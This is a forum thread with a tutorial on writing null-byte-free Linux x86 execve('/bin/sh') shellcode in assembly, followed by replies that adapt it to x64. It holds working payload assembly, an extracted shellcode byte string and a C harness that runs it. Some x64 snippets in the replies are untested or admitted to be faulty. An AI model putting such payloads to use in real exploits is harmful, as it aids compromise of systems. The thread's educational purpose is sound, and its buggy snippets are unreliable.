Linux Shellcoding (Part 1.0)

IoTh1nkN0t · May 10, 2016, 3:31pm

As promised, here is the shellcode tutorial once again

Requirements

Alright, so this isn’t going to be an msfvenom tutorial (shellcodes are payloads).
This tutorial will focus on writing shellcodes using Assembly.

Knowledge of C and Assembly is highly recommended. Also knowing how the stack works is a big plus.

Memory Segments

When a program is run it is loaded into RAM. Normally 5 segments are used in programs:

The stack segment (for function calls: local variables and return addresses).
The heap segment (for dynamically allocating memory).
The data segment (initialized global and static variables).
The bss segment (uninitialized global and static variables).
The text segment (the set of instructions, the actual code).

With assembly you have total control over these segments.
In shellcoding however we will only be using the text and the stack segment.

Assembly primer

So first we need to know some assembly.

The registers
We will be focusing on a couple of registers:

The EAX register
The EBX register
The ECX register
The EDX register
The ESP register

These registers are like little pieces of memory that are in the CPU.
They have nothing to do with RAM though as they are part of the CPU.
The CPU uses these registers to do calculations and perform simple algorithms.

In assembly we address these registers by name; they can be thought of as variables.

Assembly instructions
There are some instructions that are important in assembly programming:

MOV (assign, for example MOV EAX, 32 (EAX = 32)).
XOR (Exclusive OR, for example XOR EAX, EAX)
PUSH (Push something on the stack, example: PUSH EAX).
POP (Load what was on the stack in a register/variable, example: POP EBX).
CALL (Call a function, for example: CALL FuncPrint).
INT (Software interrupt, hands control to the kernel, for example INT 0x80 which 32 bit Linux uses for calling syscalls).

Be sure that you understand these concepts.
You can of course try to learn what they mean from this tutorial,
but it’s better to take your time to learn about these from a more in depth source.

Syscalls

What is important in shellcoding is making use of syscalls.
Syscalls are functions that the kernel provides. This means that if your shellcode calls a syscall,
you don’t have to include headers or declare them.

Here: http://syscalls.kernelgrok.com/ you can find an overview of all Linux x86 syscalls. Look up syscall 11 (0xB).

A syscall takes arguments like a normal function; however, syscalls differ in that the arguments are passed in registers instead of on the stack.
You can think of syscall parameters like argv[] in C:

argv[0], the ‘first’ argument (your program's name in C), would be the EAX register.
This is where you load the syscall number; for execve this is 11, or 0xB in hex.

argv[1], the second argument, would be the EBX register. For execve this is the path of the program to run, for example the string “/bin/bash”.

Note that a string in C is passed as a pointer, for example char *s = “Hello World”.
The variable ‘s’ is a pointer and NOT the actual string; it’s the memory address where the string is stored.
s could be something like 0x4000b401. At 0x4000b401 you’d then find the first character, which for “/bin/bash” is ‘/’ or 0x2f in hex.
The string is read from there until the nullbyte 0x00. The actual string would never fit in a 32 bit register.

The third argument is ECX; for execve this is a pointer to the list of argument strings for the program that gets called. The fourth is EDX; for execve this is the environment. In this tutorial we pass 0 (NULL) for the arguments.

A too simple shellcode

A shellcode is in many ways similar to a normal program, except for the fact that it runs inside the virtual address space of the program you are exploiting (so not its own).

The name shellcode is kind of misleading: it implies shellcodes are used to spawn shells. Nowadays there are many other uses for shellcodes,
like running chmod 777 on a certain program, or downloading and executing a file. Nevertheless, ‘shellcode’ was the name that stuck.

Today we will be writing a simple shellcode that spawns a shell.

First though, we will write a normal assembly program. You will need nasm installed on your machine to assemble it:
sudo apt-get install nasm

So here is the assembly program:

section .data
  msg db '/bin/sh', 0 ; db stands for define byte, msg is the address of the null terminated string.
 
section .text
  global _start   ; Needed for the linker, comparable to int main()
 
_start:
  mov eax, 11     ; eax = 11, think of it like this mov [destination], [source], 11 is execve
  mov ebx, msg    ; Load the string pointer into ebx
  mov ecx, 0      ; no arguments in ecx
  int 0x80        ; syscall
 
  mov eax, 1      ; exit syscall (only reached if execve fails)
  mov ebx, 0      ; no errors
  int 0x80        ; syscall

Copy and paste it in an editor and save as shell.asm
To assemble and link it use the following commands:
nasm -f elf -o shell.o shell.asm
ld -o shell shell.o
(On a 64 bit system, ld has to be told to produce a 32 bit binary: ld -m elf_i386 -o shell shell.o)
Now run it with:
./shell

Awesome, a shell. This is what we wanted! Easy, right?
Now let’s try to extract the shellcode.
To do so use the command:
objdump -M intel -d shell
This will result in:

Let’s look at the 2nd line in _start: instead of msg, it says 0x80490a0. This is the memory address of the string msg.

This is a problem though. Remember that I said a shellcode doesn’t use its own virtual space, but that of the target program?
This means that the address 0x80490a0 probably contains either garbage or nothing, since the .data segment of our assembly program isn’t part of the shellcode.
The shellcode would be:
"\xb8\x0b\x00\x00\x00\xbb\xa0\x90\x04\x08\xb9\x00\x00\x00\x00\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80"
Now we face another problem: nullbytes.

Eliminating nullbytes

Before we continue, let’s do an experiment with a C program.
Open up an editor and write the simple program:

#include <stdio.h>
int main()
{
    printf("Hello\x00 World!");

    return 0;
}

Compile and run.

Result:
Hello

So what happened here? If you’ve programmed in C you may know the problem: strings use \x00 as their terminator.
In a buffer overflow, the shellcode is usually delivered as a string and copied onto the stack by a function that stops at the first nullbyte.
Therefore a nullbyte will cut off the chain of instructions.

So now let’s look at our program once again.

XOR

Like I said earlier XOR is an assembly instruction.
XOR is like OR, however there is one major difference.
Let’s look at two tables.

OR:
1 OR 1 = 1
1 OR 0 = 1
0 OR 1 = 1
0 OR 0 = 0

and

XOR:
1 XOR 1 = 0
1 XOR 0 = 1
0 XOR 1 = 1
0 XOR 0 = 0

So how is this relevant? Well, remember that you can’t use nullbytes.
So if you want to put 0 in a register, doing MOV EAX, 0 would put nullbytes in the shellcode.

Let’s say the EAX register looks like this:
<many zeros and ones>…0010001101
XOR’ing EAX with itself XORs each bit with itself.
Each bit is either 1 or 0.

1 XOR 1 = 0.
0 XOR 0 = 0.

Therefore every bit gets set to 0.
Doing so would be the same as mov eax, 0, but without the use of nullbytes.

Now let’s look at the objdump output once again.

Notice that the operation MOV EAX, 0xb still gives nullbytes as a result.
The reason for this is that EAX is a 32 bit register, so the value is encoded as a full 4 bytes.

You can read the line b8 0b 00 00 00 as:
b8 (MOV into EAX) 0b 00 00 00 (the value 11, stored lowest byte first), which translates to EAX = 00 00 00 0b, or MOV EAX, 0xb.

Addressing Lower Halves of Registers

If you’re already familiar with assembly you might’ve read that EAX’s lower half can also be used in instructions.
This lower half is called AX and is 2 bytes (16 bits) in size.

AX can also be split. The higher half is called AH and the lower half is called AL.
Think of it like this:

[---16bits---|--AH-8bits-|--AL-8bits-]
[---16bits---|-------16bits-AX-------]
[-----------32bits---EAX-------------]

So in order to assign 11 to EAX, we have to combine the things we discussed.
First we need to make sure EAX doesn’t contain garbage values.
To do so we zero EAX out with the XOR operator.
XOR EAX, EAX
Now we can assign 11 to the lowest byte of EAX.
MOV AL, 0xb (11)

Using the Stack to Store Variables

So we already have the first argument for our syscall ready.

Now we need to assign a string pointer to EBX, but before we do that, we need something to point to, that is, the actual character array:

|'/'|'b'|'i'|'n'|'/'|'s'|'h'|\x00|

The only writable memory we can count on for this is the stack.
Note that each ASCII character has a corresponding hex value; a table can be found here: http://www.asciitable.com/
From left to right the hexcodes are:
0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x00.
What we can do is push these on the stack. Then we can use the stack pointer ESP as a string pointer.
Because the stack is FILO and grows downwards, we have to push the values in reverse order.
To push values on the stack you can use the instruction PUSH:
PUSH <value>; be aware that each PUSH puts 4 bytes on the stack.
Now a problem arises. You can’t push “/sh\x00” on the stack, as the nullbyte would terminate the shellcode.
To solve this, we have to go back a few steps and look at our first two lines:

XOR EAX, EAX
MOV AL, 0xb

Notice that after XOR EAX, EAX, EAX will have the value 0.

In shellcoding it is often wise to use this to our advantage for as long as possible: we now have a 0 we can use, so with this in mind we will postpone the instruction MOV AL, 0xb.

So instead of pushing 0x0068732f ("\x00hs/") on the stack, we handle the two parts separately: the terminating 0x00 and the characters 0x68732f.
Instead of doing PUSH 0x00, we do PUSH EAX.
It has the same result, but we avoided a nullbyte.
Next we can do:

PUSH 0x68732f2f (Added a / here to avoid a nullbyte).
PUSH 0x6e69622f

Now the stack pointer will point to the string “/bin//sh”, followed by the nullbytes from PUSH EAX.
So this will be our 2nd argument (EBX).

MOV EBX, ESP

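The third argument (ECX) for our syscall execve is the pointer to the argument list for /bin/sh. Of course we don’t want this to contain garbage, because then execve would most likely fail on an invalid pointer. Therefore we need ECX to be 0. The same goes for EDX (the environment): it is usually 0 when our test program starts, but inside an exploited process it may hold anything, so a robust shellcode zeroes it as well (MOV EDX, EAX).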

Once again we can use our EAX register.

MOV ECX, EAX

Finally we assign EAX:

MOV AL, 0xb

And do the syscall:

INT 0x80

This leaves us with the following code:

section .text
  global _start

_start:
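  xor eax, eax        ; eax = 0 without nullbytes
  push eax            ; terminating null for the string
  push 0x68732f2f     ; "//sh"
  push 0x6e69622f     ; "/bin"
  mov ebx, esp        ; ebx points to "/bin//sh"
  mov ecx, eax        ; no arguments
  mov edx, eax        ; no environment (edx may hold garbage in a real target)
  mov al, 0xb         ; execve
  int 0x80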

Extracting the Shellcode

Now let’s assemble and link it
nasm -f elf -o shell.o shell.asm
ld -o shell shell.o

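Now to get the shellcode I wrote this C program:

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
        char l = 1;             /* 1 while we are inside a run of non-null bytes */
        unsigned char buf;
        int fd;

        if (argc < 2) {
                fprintf(stderr, "usage: %s <file>\n", argv[0]);
                return 1;
        }
        fd = open(argv[1], O_RDONLY);
        if (fd < 0) {
                perror("open");
                return 1;
        }
        while (read(fd, &buf, 1) == 1) {
                if (buf == 0 && l == 1) {
                        /* first nullbyte after a run: end the line */
                        printf(" \n");
                        l = 0;
                }
                else if (buf) {
                        printf("\\x%02x", buf);
                        l = 1;
                }
        }

        close(fd);
        return 0;
}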

Run it on the linked binary. It skips runs of nullbytes and prints each continuous run of other bytes as one line of hex escapes.
One of these lines is your shellcode.

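To check if your shellcode works you can use this simple C program.
On a current system you will probably have to build it as a 32 bit binary with an executable stack (for example gcc -m32 -z execstack), otherwise the call just segfaults:

int main()
{
  /* Local array, so the bytes live on the stack. */
  char shellcode[] = "<the shellcode>";

  /* Treat the array as a function and call it. */
  (*(void(*)()) shellcode)();
  return 0;
}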

That was all for today, hope you enjoyed it!

unh0lys0da

WireWise · May 10, 2016, 7:06pm

Great post unh0lys0da, really enjoyed reading it. Learning this myself, and this post really cleared up some things, Thank you.

pry0cc · May 10, 2016, 7:57pm

Badass tutorial mate. Love the insight.

IoTh1nkN0t · May 10, 2016, 11:56pm

Thanks, good to hear that.
If you have any questions, post them here.

oaktree · May 11, 2016, 12:00am

As great as this post is, shellcoding will make my head hurt for at least a little while longer.

AgentSniff · May 11, 2016, 1:09am

Wow! Very nice!

Those using Linux x64 based systems can check the system call list here.

To assemble, use nasm with -f elf64 (nasm --help for more info).

The manual page of syscall (man syscall) also shows a table with the registers used to pass the system call args.

So the print code in x64 is like:

section .data

        msg db 'Hello 0x00SEC',0x0a

section .text

        global _start

_start:

        mov rax,1       ; [1] - sys_write
        mov rdx,1       ; 0 = stdin / 1 = stdout / 2 = stderr
        mov rsi,msg     ; pointer(mem address) to msg (*char[])
        mov rdx,14      ; msg size
        syscall         ; calls the function stored in rax

        mov rax,60      ; [60] - sys_exit
        mov rdx,0       ; exit with code rdx(0)
        syscall

To start or “execute” a shell like the first example, use [59] sys_execve instead of [1] sys_write.
Don’t forget to change the register values to fit the sys_execve syntax.

Cromical · May 11, 2016, 1:59am

Thanks! Same as @WireWise this really helped clear up a load of things as well! Thanks.

dtm · May 11, 2016, 3:05am

There is no S in hexadecimal.

AgentSniff · May 11, 2016, 3:43am

it is a string, not an hexadecimal value

dtm · May 11, 2016, 5:13am

Right, my mistake.

Also just wanted to point out some slight errors:

XOR:
// these should be XORs, not ORs
1 OR 1 = 0    // <- 1 OR 1 is 1
1 OR 0 = 1
0 OR 1 = 1
0 OR 0 = 0

and in the following line

A shellcode is in many ways similar to a normal program, except for the 
fact that it uses the RAM used by the program you are exploitating (so 
not his own).

RAM is used by all programs; it is the entirety of all memory. I think what you meant to say was that the shellcode shares the same memory space as the target program.

0x00pf · May 11, 2016, 5:28am

There are some unusual circumstances where that does not hold: XIP (eXecute In Place). But this is not that common.

IoTh1nkN0t · May 11, 2016, 7:03am

Hey thanks for your comment.
Thanks for mentioning that link.
It’s a common misstep for people.

Few things:
Execve and write are different syscalls and require different arguments.
Assigning rdx twice seems like a typo.
(Shouldn’t the first RDX be RDI?)

In 64 bit, instead of using
EAX, EBX, ECX, EDX, ESI, EDI
with EAX being the syscall number and EBX … EDI its arguments,

you use:
RDI, RSI, RDX, RCX, R8, R9
for the arguments of normal function calls in USERSPACE.

And:
RAX, RDI, RSI, RDX, R10, R8, R9
with RAX once again for the syscall number, when calling into KERNELSPACE.

Anyway, perhaps you could write a x64 ASM tutorial? Would be awesome, there aren’t many good ones online.

@dtm
Changed the XOR and the RAM stuff.

@0x00pf

Woah, this is some insane stuff. Though I can imagine it could be hard to find the location?

unh0lys0da

0x00pf · May 11, 2016, 6:35pm

Not sure what you mean by find the location. Anyhow, I never had a chance to use it. It is for really constrained embedded systems…

IoTh1nkN0t · May 11, 2016, 9:56pm

Find the location of the inode(?) to start reading from

AgentSniff · May 11, 2016, 10:57pm

You are right about the typo with rdi and rdx.

My experience with Assembly is only with 8 bit processors like ATmega and PIC.

I just translated your code for x64, I hope to learn more with your next tutorials!

I was trying to open a shell using the stack like in your example, but it does not work.

take a look:

section .text

        global _start:

_start:

        push 'sh'
        push 'bin/'
        mov rax,59
        mov rdi,rsp
        mov rsi,0
        ;mov rdx,0
        syscall

        mov rax,60
        mov rdi,0
        syscall

in this order of push command, it will first push two null bytes then ‘h’ and ‘s’, followed by second push ‘/’ ‘n’ ‘i’ ‘b’ right?

the stack works like a FILO (first in last out) so it spits ‘b’ ‘i’ ‘n’ ‘/’ ‘s’ ‘h’ x0 x0 right?

shell_stack: file format elf64-x86-64

Disassembly of section .text:

0000000000400080 <_start>:
  400080:    68 73 68 00 00            pushq  $0x6873
  400085:    68 62 69 6e 2f            pushq  $0x2f6e6962
  40008a:    b8 3b 00 00 00            mov    $0x3b,%eax
  40008f:    48 89 e7                  mov    %rsp,%rdi
  400092:    be 00 00 00 00            mov    $0x0,%esi
  400097:    0f 05                     syscall 
  400099:    b8 3c 00 00 00            mov    $0x3c,%eax
  40009e:    bf 00 00 00 00            mov    $0x0,%edi
  4000a3:    0f 05                     syscall

0x00pf · May 12, 2016, 4:38am

OK! I think that depends on the specific system. Usually, and especially for the first stage boot code, you have just one option (the address where the processor starts running code). For even more embedded systems you will probably need a specialised linker script.

IoTh1nkN0t · May 12, 2016, 6:32am

It won’t work for several reasons:

There are nullbytes. (If you’d use this to overflow nullterminated string input).
It’s /bin/sh
/bin/sh also has to be null terminated (You need to push a null on the stack as well).

Apart from that the code is right.

I think the following should work:

section .text
    global _start

_start:
    xor rax, rax
    push rax
    push '//sh'
    push '/bin'
    mov rdi, rsp
    mov rsi, rax
    mov rdx, rax
    xor rax, 59
    syscall

I haven’t tested it, but I think it’s somewhat like this.
You could also try to load /bin//sh in a register since we’re working with 64 bit ^^ (64 bit, 8 bytes, 8 chars).
It would be something like:

xor rax,rax
push rax
mov rsi, rax
mov rdx, rax
mov rbx, '/bin//sh'
push rbx
mov rdi, rsp
xor rax, 59
syscall

But I also haven’t tried this one.
I’ll try them later.

AgentSniff · May 12, 2016, 4:10pm

Thank you for your reply

I’m quite new to Linux, and always forget to put the root ‘/’ when using absolute path

I tried your code, it does not work here. I saw in the disassembly that the result of xor rax,rax is not null.

could you check this?

0x00pf · May 12, 2016, 4:50pm

@unh0lys0da: Your second code works OK on my system. The first one crashes… I haven’t checked why. I like the xor rax,59.

This is my version (@unh0lys0da a small variation of the one you’ve already seen).

section .text
	msg db '/bin/sh',0 
	
	global _start   
 
_start:
	xor rax,rax
	mov rdx,rax 		; No Env
	mov rsi,rax		; No argv
	lea rdi, [rel msg]

	add al, 0x3b

	syscall

IoTh1nkN0t · May 12, 2016, 6:08pm

xor whatever, whatever
Should ALWAYS result in 0.
for each bit it is either 1 or 0
1 XOR 1 = 0
0 XOR 0 = 0

There is no way that RAX != RAX
Every bit in RAX == The same bit in RAX